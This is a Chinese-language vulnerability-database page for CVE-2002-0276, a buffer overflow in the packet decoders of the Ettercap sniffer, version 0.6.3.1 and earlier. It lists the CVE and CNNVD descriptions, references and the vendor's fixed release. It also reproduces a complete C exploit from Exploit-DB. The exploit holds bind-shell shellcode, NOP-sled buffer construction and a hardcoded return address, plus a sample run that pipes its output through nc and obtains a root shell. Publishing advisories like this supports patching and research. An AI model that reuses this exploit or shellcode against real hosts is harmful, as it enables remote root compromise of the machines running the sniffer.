CVE-2002-0276
CVSS7.5
发布时间 :2002-05-31 00:00:00
修订时间 :2016-10-17 22:18:09
NMCOE    

[原文]Buffer overflow in various decoders in Ettercap 0.6.3.1 and earlier, when running on networks with an MTU greater than 2000, allows remote attackers to execute arbitrary code via large packets.


[CNNVD]Ettercap大数据包缓冲区溢出漏洞(CNNVD-200205-113)

        
        Ettercap是一个Linux和BSD系统下的多用途数据包嗅探程序,它也已经被移植到Windows平台下。
        Ettercap在处理大数据包的实现上存在问题,远程攻击者可能利用这个漏洞在运行Ettercap的主机上执行任意指令。
        当Ettercap收到一个大的数据包并把它提交给解码程序解码时,可能发生缓冲区溢出问题,堆栈中的数据被改写,从而导致执行攻击者注入的任意指令。这种情况可能在Ettercap与一个MTU大于以太网标准值的网络接口相联系时或者Ettercap收到一个有伪造的包长度信息的数据包时发生。
        Ettercap通常情况下以root身份执行,并且之前版本的Ettercap也有可能受此漏洞的影响。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0276
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0276
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200205-113
(官方数据源) CNNVD

- 其它链接及资源

http://ettercap.sourceforge.net/index.php?s=history
(UNKNOWN)  CONFIRM  http://ettercap.sourceforge.net/index.php?s=history
http://marc.info/?l=bugtraq&m=101370874219511&w=2
(UNKNOWN)  BUGTRAQ  20020213 [NGSEC-2002-1] Ettercap, remote root compromise
http://www.iss.net/security_center/static/8200.php
(UNKNOWN)  XF  ettercap-memcpy-bo(8200)
http://www.securityfocus.com/bid/4104
(UNKNOWN)  BID  4104

- 漏洞信息

Ettercap大数据包缓冲区溢出漏洞
高危 边界条件错误
2002-05-31 00:00:00 2005-05-02 00:00:00
远程  
        
        Ettercap是一个Linux和BSD系统下的多用途数据包嗅探程序,它也已经被移植到Windows平台下。
        Ettercap在处理大数据包的实现上存在问题,远程攻击者可能利用这个漏洞在运行Ettercap的主机上执行任意指令。
        当Ettercap收到一个大的数据包并把它提交给解码程序解码时,可能发生缓冲区溢出问题,堆栈中的数据被改写,从而导致执行攻击者注入的任意指令。这种情况可能在Ettercap与一个MTU大于以太网标准值的网络接口相联系时或者Ettercap收到一个有伪造的包长度信息的数据包时发生。
        Ettercap通常情况下以root身份执行,并且之前版本的Ettercap也有可能受此漏洞的影响。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 暂时停止使用Ettercap。
        厂商补丁:
        Ettercap
        --------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        
        http://ettercap.sourceforge.net/download/ettercap-0.6.4.tar.gz

- 漏洞信息 (21289)

Ettercap 0.6.3 .1 Large Packet Buffer Overflow Vulnerability (EDBID:21289)
linux remote
2002-02-14 Verified
0 Fermín J. Serna
N/A [点击下载]
source: http://www.securityfocus.com/bid/4104/info

Ettercap is a multipurpose packet sniffer for Linux and BSD based systems. It includes support for features such as character injection and packet filtering. Ettercap has been ported to Windows.

A remotely exploitable buffer overflow condition exists in Ettercap. If a large packet is recieved and passed to some decoders, stack data may be overwritten, leading to execution of arbitrary code. This condition may be caused by associating Ettercap with an interface with a larger MTU than ethernet, or by sending a forged packet with a misleading data length field.

Ettercap would normally be executed by the root user. Earlier versions of Ettercap may share this vulnerability.

/* 
 * ettercap-0.6.3.1 remote root xploit 
 *
 * By: Ferm�n J. Serna <fjserna@ngsec.com>
 *     Next Generation Security Technologies
 *     http://www.ngsec.com
 *
 * DESCRIPTION:
 * ============
 *
 * Several decoders (mysql, irc, ...) suffer the following problem:
 *
 *    memcpy(collector, payload, data_to_ettercap->datalen);
 *
 * collector is declared as: 
 *
 *    u_char collector[MAX_DATA];
 * 
 *  where MAX_DATA is:
 *
 *  #define MAX_DATA 2000
 *
 *  So on interfaces where MTU is higher than 2000 you can exploit 
 *  ettercap. Nop, normal ethernets have MTU:1500 ;P
 *
 *  Here are common MTU and interface types:
 * 
 *    65535 Hyperchannel
 *    17914 16 Mbit/sec token ring
 *    8166  Token Bus (IEEE 802.4)
 *    4464  4 Mbit/sec token ring (IEEE 802.5)
 *    1500  Ethernet
 *    1500  PPP (typical; can vary widely)
 *
 *  Sample explotation could be also in loopback interfaces: MTU:16436
 *
 *  piscis:~# ettercap -NszC -i lo &
 *  [1] 21887
 *  piscis:~# ./ettercap-x 0 | nc localhost mysql
 *  ettercap-0.6.3.1 xploit by Ferm�n J. Serna <fjserna@ngsec.com>
 *  Next Generation Security Technologies
 *  http://www.ngsec.com   
 *
 *  punt!
 *  piscis:~# telnet localhost 36864
 *  Trying 127.0.0.1...
 *  Connected to localhost.
 *  Escape character is '^]'.
 *  id;
 *  uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
 *
 *  Madrid, 5/02/2002
 *
 */ 


#include <stdio.h>
#include <string.h>

#define NUM_ADDR 100
#define NOP 0x41
#define BUFF_SIZE 2200
#define RET_ADDR 0xbfffea58
#define OFFSET 0

char shellcode[]=
"\x1b\xeb\x78\x5e\x29\xc0\x89\x46\x10\x40\x89\xc3\x89\x46\x0c\x40"
"\x89\x46\x08\x8d\x4e\x08\xb0\x66\xcd\x80\xeb\x01\x3C\x43\xc6\x46"
"\x10\x10\x66\x89\x5e\x14\x88\x46\x08\x29\xc0\x89\xc2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\xeb\x01\x2D\x86\xc3\xb0\x3f\x29\xc9"
"\xcd\x80\xb0\x3f\x41\xcd\x80\xb0\x3f\x41\xcd\x80\x88\x56\x07\x89"
"\x76\x0c\x87\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80\xe8\x83\xff\xff\xff"
"/bin/sh";

int main(int argc, char **argv) {
char buffer[BUFF_SIZE];
char *ch_ptr;
unsigned long *lg_ptr;
int aux;
int offset=OFFSET;

 fprintf(stderr,"ettercap-0.6.3.1 xploit by Ferm�n J. Serna <fjserna@ngsec.com>\n");
 fprintf(stderr,"Next Generation Security Technologies\n");
 fprintf(stderr,"http://www.ngsec.com\n\n");


 if (argc==2) offset=atoi(argv[1]);

 memset(buffer,0,sizeof(buffer));

 ch_ptr=buffer;
 memset(ch_ptr,NOP,sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR);
 ch_ptr+=sizeof(buffer)-strlen(shellcode)-4*NUM_ADDR;
 memcpy(ch_ptr,shellcode,strlen(shellcode));
 ch_ptr+=strlen(shellcode);
 lg_ptr=(unsigned long *)ch_ptr;
 for (aux=0;aux<NUM_ADDR;aux++) *(lg_ptr++)=RET_ADDR+offset;
 ch_ptr=(char *)lg_ptr;
 *ch_ptr='\0';
  
 printf("%s",buffer);

 return(0);

}



		

- 漏洞信息

5337
ettercap Decoder Crafted Packet Parsing Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2002-02-14 Unknow
2002-02-14 Unknow

- 解决方案

Upgrade to version 0.6.4-1 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站